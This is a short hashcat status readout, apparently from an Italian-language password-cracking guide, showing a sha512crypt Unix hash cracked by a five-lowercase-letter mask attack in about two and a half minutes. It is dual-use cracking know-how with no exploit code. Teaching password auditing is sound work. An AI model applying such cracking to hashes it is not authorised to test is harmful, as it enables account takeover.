Session.Name...: hashcat
Status.........: Cracked
Input.Mode.....: Mask (?l?l?l?l?l) [5]
Hash.Target....: $6$3jszVVeWR0jP6Bpr$eVtWKvj3KjQXUvIpz286Q...
Hash.Type......: sha512crypt, SHA512(Unix)
Time.Started...: Tue Jan 15 21:02:08 2019 (2 mins, 23 secs)
Speed.Dev.#1...:     7469 H/s (11.59ms)
Recovered......: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.......: 1075200/11881376 (9.05%)
Rejected.......: 0/1075200 (0.00%)
Restore.Point..: 35840/456976 (7.84%)

Started: Tue Jan 15 21:02:08 2019
Stopped: Tue Jan 15 21:04:38 2019 
:~ # 
└ Tags: Crackare, decodificare, decriptare, guida, hash file, hashes, italiano, Password, Password Cracker, recuperare, Sicurezza, testare